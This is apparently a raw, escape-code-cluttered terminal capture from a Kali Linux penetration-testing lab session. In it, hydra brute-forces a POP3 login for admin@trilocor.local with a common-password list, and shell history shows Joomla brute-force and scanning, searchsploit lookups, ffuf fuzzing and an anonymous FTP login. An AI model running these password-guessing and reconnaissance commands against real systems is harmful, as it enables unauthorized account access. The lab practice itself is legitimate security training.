#[33m<#[39m#[39mwordlist#[33m>#[39m#[39m pop3://#[33m<#[39m#[39mIP#[33m>#[39m#[39m
#[27D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[98C[8:50:25]#[0m#[133Da -P#[39m
#[33m<#[39mwordlis#[39mt#[33m>#[39m pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26D
#[J#[0;1;2mfile#[0m
#[J#[0mjoomlascan.py #[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l a -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[97C[8:50:25]#[0m#[132Dd -P#[39m
#[33m<#[39mwordlis#[39mt#[33m>#[39m pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26D
#[J#[0;1;2mfile#[0m
#[J#[01;32mREADME.md#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l ad -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[96C[8:50:25]#[0m#[131Dm -P#[39m
#[33m<#[39mwordlis#[39mt#[33m>#[39m pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26Di
-P#[39m #[33m<#[39mwordlis#[39mt#[33m>#[39m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[26D
#[J#[A#[27C##[33m"#[33m #[33m-#[33mP#[33m
#[33m<#[33mw#[33mo#[33mr#[33md#[33ml#[33mi#[33ms#[33mt#[33m>#[33m
#[33mp#[33mo#[33mp#[33m3#[33m:#[33m/#[33m/#[33m<#[33mI#[33mP#[25D#[39m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[78C[8:50:25]#[0m#[108D#[10C
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[78C[8:50:25]#[0m#[98D#
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[33m<#[39mwordlist#[33m>#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[78C[8:50:25]#[0m#[99D#[9D
pop3://#[33m<#[39mIP#[33m>#[39m #[39m #[39m #[21D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[33m<#[39m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[87C[8:50:25]#[0m#[108D##[39m
pop3://#[33m<#[39m#[39mIP#[33m>#[39m#[39m #[13D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[88C[8:50:25]#[0m#[109D/
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D##[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;36mbin#[0m@ #[01;34mboot#[0m/ #[01;34mdev#[0m/
#[01;34metc#[0m/ #[01;34mhome#[0m/ #[01;36mlib#[0m@
#[01;36mlib32#[0m@ #[01;36mlib64#[0m@ #[01;34mlost+found#[0m/
#[01;34mmedia#[0m/ #[01;34mmnt#[0m/
#[01;34mopt#[0m/ #[01;34mproc#[0m/ #[01;34mroot#[0m/
#[01;34mrun#[0m/ #[01;36msbin#[0m@ #[01;34msrv#[0m/
#[01;34msys#[0m/ #[30;42mtmp#[0m/ #[01;34musr#[0m/
#[01;34mvar#[0m/
#[0;1;2mfile#[0m
#[J#[01;36minitrd.img#[0m@ #[J#[01;36minitrd.img.old#[0m@
#[J#[01;36mvmlinuz#[0m@ #[J#[01;36mvmlinuz.old#[0m@
#[J#[5A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[4m/#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[87C[8:50:25]#[0m#[108D##[4m/#[4mu#[24m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D###[24m/#[24mu
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /u
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[86C[8:50:25]#[0m#[107Ds
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /us
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[85C[8:50:25]#[0m#[106Dr
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#####[4m/#[4mu#[4ms#[4mr#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[4m/usr#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[84C[8:50:25]#[0m#[105D##[4mr#[4m/#[24m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mbin#[0m/ #[J#[01;34mgames#[0m/ #[J#[01;34mi686-w64-mingw32#[0m/
#[J#[01;34minclude#[0m/ #[J#[01;34mlib#[0m/ #[J#[01;34mlib32#[0m/
#[J#[01;34mlib64#[0m/ #[J#[01;34mlibexec#[0m/ #[J#[01;34mlocal#[0m/
#[J#[01;34msbin#[0m/ #[J#[01;34mshare#[0m/ #[J#[01;34msrc#[0m/
#[J#[01;34mx86_64-w64-mingw32#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[4m/usr/#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[83C[8:50:25]#[0m#[104D##[4m/#[4ms#[24m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#######[24m/#[24mu#[24ms#[24mr#[24m/
#[24msh pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/sh
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[81C[8:50:25]#[0m#[102Da
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/sha
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[80C[8:50:25]#[0m#[101Dr
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/shar
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[79C[8:50:25]#[0m#[100De
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#[10D#[4m/#[4mu#[4ms#[4mr#[4m/
#[4ms#[4mh#[4ma#[4mr#[4me#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[4m/usr/share#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[78C[8:50:25]#[0m#[99D##[4me#[4m/#[24m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#[30m#[104m#[39m#[49m#[30m#[104m#[39m
#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34maccounts#[0m/ #[01;34maccountsservice#[0m/
#[01;34maclocal#[0m/ #[01;34malsa#[0m/ #[01;34malsa-card-
profile#[0m/ #[01;34mamass#[0m/ #[01;34mant#[0m/
#[01;34mapache2#[0m/
#[01;34mapparmor-features#[0m/ #[01;34mapplication-registry#[0m/
#[01;34mapplications#[0m/ #[01;34mapport#[0m/ #[01;34mapps#[0m/
#[01;34mappstream#[0m/ #[01;34mapt-file#[0m/ #[01;34marp-scan#[0m/
#[01;34maspell#[0m/ #[01;34matril#[0m/
#[01;34mautopsy#[0m/ #[01;34mavahi#[0m/ #[01;34mawk#[0m/
#[01;34mbackgrounds#[0m/ #[01;34mbase-files#[0m/ #[01;34mbase-passwd#[0m/
#[01;34mbash-completion#[0m/ #[01;34mbinfmts#[0m/
#[01;34mbluedevilwizard#[0m/ #[01;34mblueman#[0m/ #[01;34mbug#[0m/
#[01;34mbuild-essential#[0m/ #[01;34mburpsuite#[0m/ #[01;34mca-
certificates#[0m/
#[01;34mca-certificates-java#[0m/ #[01;34mcaja#[0m/
#[01;34mcatdoc#[0m/ #[01;34mcatfish#[0m/ #[01;34mcffi-
wheels#[0m/ #[01;34mcherrytree#[0m/ #[01;34mchromium#[0m/
#[01;34mcmake#[0m/
#[01;34mcolor#[0m/ #[01;34mcolord#[0m/
#[01;34mcolor-schemes#[0m/ #[01;34mcommand-not-found#[0m/ #[01;34mcommix#[0m/
#[01;34mcommon-licenses#[0m/ #[01;34mconfig.kcfg#[0m/ #[01;34mconsolefonts#[0m/
#[01;34mconsole-setup#[0m/ #[01;34mconsoletrans#[0m/
#[01;34mcontractor#[0m/ #[01;34mcreddump7#[0m/ #[01;34mcrunch#[0m/
#[01;34mcryptsetup#[0m/ #[01;34mcups#[0m/ #[01;34mdavtest#[0m/
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P #[4m/usr/share/#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[77C[8:50:25]#[0m#[98D##[4m/#[4ms#[24m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#[12D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/#[24mse
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mseclists#[0m/ #[J#[01;34msensible-utils#[0m/ #[J#[01;34mset#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/share/se
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[75C[8:50:25]#[0m#[96Dc
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mseclists#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/share/sec
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[74C[8:50:25]#[0m#[95D
#[J#[A#[59C#[14D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/
#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[1m#[4m/#[0m#[24m
p#[39mop3#[39m://#[33m<#[39mIP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[01;34mDiscovery#[0m/ #[01;34mFuzzing#[0m/ #[01;34mIOCs#[0m/
#[01;34mMiscellaneous#[0m/ #[01;34mPasswords#[0m/ #[01;34mPattern-
Matching#[0m/ #[01;34mPayloads#[0m/ #[01;34mUsernames#[0m/ #[01;34mWeb-
Shells#[0m/
#[0;1;2mfile#[0m
#[J#[0mREADME.md#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists#[1m#[4m/#[0m#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[68C[8:50:25]#[0m#[89D##[1m#[4m/
#[1m#[4mP#[0m#[24m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#[21D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[0m#[24m/
#[0m#[24mP#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mPasswords#[0m/ #[01;34mPattern-Matching#[0m/ #[01;34mPayloads#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103m/usr/share/seclists/Pa#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/share/seclists/P
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[67C[8:50:25]#[0m#[88Da
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mPasswords#[0m/ #[J#[01;34mPattern-Matching#[0m/
#[J#[01;34mPayloads#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/share/seclists/Pa
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[66C[8:50:25]#[0m#[87Ds
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mPasswords#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P /usr/share/seclists/Pas
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[65C[8:50:25]#[0m#[86D
#[J#[A#[68C#[23D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/
#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[4m/
#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[1m#[4m/#[0m#[24m
#[39mpop#[39m3://#[33m<#[39mIP#[33m>#[39m#[12D#[30m#[104m#[39m#[49m#[30m#[104m#[39m
#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mBiblePass#[0m/ #[01;34mBooks#[0m/ #[01;34mCommon-
Credentials#[0m/ #[01;34mCracked-Hashes#[0m/ #[01;34mDefault-
Credentials#[0m/ #[01;34mHoneypot-Captures#[0m/ #[01;34mKeyboard-Walks#[0m/
#[01;34mLeaked-Databases#[0m/ #[01;34mMalware#[0m/
#[01;34mPermutations#[0m/ #[01;34mphp-hashes#[0m/
#[01;34mSoftware#[0m/ #[01;34mWiFi-WPA#[0m/
#[01;34mWikipedia#[0m/
#[0;1;2mfile#[0m
#[0m2020-200_most_used_passwords.txt 2023-200_most_used_passwords.txt 500-
worst-passwords.txt #[01;31m500-worst-passwords.txt.bz2#[0m bt4-
password.txt
cirt-default-passwords.txt citrix.txt clarkson-
university-82.txt common_corporate_passwords.lst darkc0de.txt
darkweb2017-top10000.txt darkweb2017-top1000.txt
darkweb2017-top100.txt darkweb2017-top10.txt days.txt
der-postillon.txt dutch_common_wordlist.txt
dutch_passwordlist.txt dutch_wordlist german_misc.txt
months.txt Most-Popular-Letter-Passes.txt
#[J#[30m#[104m(MORE)#[39m#[49m#[10A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords#[1m#[4m/#[0m#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[58C[8:50:25]#[0m#[79D##[1m#[4m/
#[1m#[4m5#[0m#[24m
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#[31D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[24m/
#[24mP#[24ma#[24ms#[24ms#[24mw#[24mo#[24mr#[24md#[24ms#[0m#[24m/
#[0m#[24m5#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0m500-worst-passwords.txt #[01;31m500-worst-passwords.txt.bz2#[0m
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103m/usr/share/seclists/Passwords/500-
worst-passwords.txt#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/5
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[57C[8:50:25]#[0m#[78D0
pop3:/#[39m/#[33m<#[39mI#[39mP#[33m>#[39m#[12D#[30m#[103m#[39m#[49m#[30m#[103m#[39m
#[49m
#[J#[0;1;2mfile#[0m
#[0m500-worst-passwords.txt #[01;31m500-worst-passwords.txt.bz2#[0m
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103m/usr/share/seclists/Passwords/500-
worst-passwords.txt#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/50
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[56C[8:50:25]#[0m#[77D
#[J#[A#[77C#[32D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/
#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[4m/
#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/#[4m5#[4m0#[4m0#[4m-
#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-#[39m#[4mp#[4ma#[4ms#[39m#[4ms#[4mwords.txt#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[12D
#[J#[0;1;2mfile#[0m
#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[35C[8:50:25]#[0m#[56D#[12C
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://#[33m<#[39mIP#[33m>#[39m#[K#[35C[8:50:25]#[0m#[44D### #[39m ###
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://#[33m<#[39m#[K#[38C[8:50:25]#[0m#[47D##[39m #
#[J#[A#[120C
#[J#]2;hydra -V -f -l admin@trilocor.local -P
pop3://10.129.197.143##]1;hydra#Hydra v9.5 (c) 2023 by van Hauser/THC & David
Maciejak - Please do not use in military or secret service organizations, or for
illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m959#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:55:52]#[148D#[?1h#=#[?
2004h
Loading...#[K#[A#####[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://10.129.197.143#[1m;#[0m#[1B
#[K#[A#[121C#[1B
#[2m #[0m#[2m920#[0m#[2m #[0mjoomlavs.rb --url blog.trilocor.local --scan--
components
#[K#[K
#[2m #[0m#[2m921#[0m#[2m #[0mcd ../
#[K#[K
#[2m #[0m#[2m922#[0m#[2m #[0mgit clone https://github.com/ajnik/joomla-bruteforce
#[K#[K
#[2m #[0m#[2m923#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m924#[0m#[2m #[0mcd joomla-bruteforce
#[K#[K
#[2m #[0m#[2m925#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m926#[0m#[2m #[0msudo python3 joomla-brute.py -u blog.trilocor.local
-w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt #[K#[K
#[2m #[0m#[2m927#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[K#[K
#[2m #[0m#[2m928#[0m#[2m #[0msudo python3 joomla-brute.py
#[K#[K
#[2m #[0m#[2m929#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-U ~/CPTS/NIX01/user_list.txt #[K#[K
#[2m #[0m#[2m930#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local/administrator -w /usr/share/seclists/Passwords/500-
worst-passwords.txt -U ~/CPTS/NIX01/u#[K#[K
#[2m #[0m#[2m931#[0m#[2m* #[0mifconfig
#[K#[K
#[2m #[0m#[2m932#[0m#[2m #[0msudo python3 joomla-brute.py -u blog.trilocor.local
-w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr admin
#[K#[K
#[2m #[0m#[2m933#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr admin #[K#[K
#[2m #[0m#[2m934#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr root #[K#[K
#[2m #[0m#[2m935#[0m#[2m #[0msudo python2.7 -m pip install urllib3
#[K#[K
#[2m #[0m#[2m936#[0m#[2m #[0mpip install urllib3
#[K#[K
#[2m #[0m#[2m937#[0m#[2m #[0mpip install certifi
#[K#[K
#[2m #[0m#[2m938#[0m#[2m #[0mpip install bs4
#[K#[K
#[2m #[0m#[2m939#[0m#[2m #[0mcd ../
#[K#[K
#[2m #[0m#[2m940#[0m#[2m #[0mwhatis gh
#[K#[K
#[2m #[0m#[2m941#[0m#[2m #[0mgithub repo clone drego85/JoomlaScan
#[K#[K
#[2m #[0m#[2m942#[0m#[2m #[0mcd ../Downloads
#[K#[K
#[2m #[0m#[2m943#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m944#[0m#[2m #[0munzip JoomlaScan-master.zip
#[K#[K
#[2m #[0m#[2m945#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m946#[0m#[2m #[0mmv JoomlaScan-master ../Tools
#[K#[K
#[2m #[0m#[2m947#[0m#[2m #[0mcd ../Tools/JoomlaScan-master
#[K#[K
#[2m #[0m#[2m948#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m949#[0m#[2m #[0mpython2.7 joomlascan.py -u
http://blog.trilocor.local
#[K#[K
#[2m #[0m#[2m950#[0m#[2m #[0msearchsploit com_contact
#[K#[K
#[2m #[0m#[2m951#[0m#[2m #[0msearchsploit com_content
#[K#[K
#[2m #[0m#[2m952#[0m#[2m #[0mlocate 11236.txt
#[K#[K
#[2m #[0m#[2m953#[0m#[2m #[0mcat
/usr/share/exploitdb/exploits/php/webapps/11236.txt
#[K#[K
#[2m #[0m#[2m954#[0m#[2m #[0msearchsploit cassiopeia
#[K#[K
#[2m #[0m#[2m955#[0m#[2m* #[0mffuf -t 100 -ic -c -u
http://blog.trilocor.local/FUZZ -w
/usr/share/seclists/Discovery/Web-Content/Apache.fuzz.txt
#[K#[K
#[2m #[0m#[2m956#[0m#[2m #[0mftp anonymous@10.129.197.143
#[K#[K
#[2m #[0m#[2m957#[0m#[2m #[0msudo apt-get install --yes filezilla
#[K#[K
#[J#[7m 958 hydra -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[0m#[K#[J#[39A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://10.129.197.143#[1m;#[0m#[K#[24C[8:55:52]#[0m#[33D
#[38B#[7m 958 hydra -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[0m#[K
#[7m 958 hydra -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[0m#[K
#[39A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://10.129.197.143#[1m;#[0m#[K#[24C[8:55:52]#[0m#[33D
#[J#[A#[121C##[0m ###########################[10D###########[10D#[9D
#[J#[0;1;2mfile#[0m
#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://10.129.197.143#[K#[25C[8:55:52]#[0m#[98D######
#[J#[0;1;2mfile#[0m
#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://10.129.197.143#[K#[25C[8:55:52]#[0m#[104D####
#[J#[0;1;2mfile#[0m
#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l admin@trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://10.129.197.143#[K#[25C[8:55:52]#[0m#[108D###
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mhydra#[39m -V -f -l @trilocor.local -P
#[4m/usr/share/seclists/Passwords/500-worst-passwords.txt#[24m
pop3://10.129.197.143#[K#[30C[8:55:52]#[0m#[133Du@trilocor.local -P#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m
pop3://10.129.197.143#[94Ds@trilocor.local -P#[24m
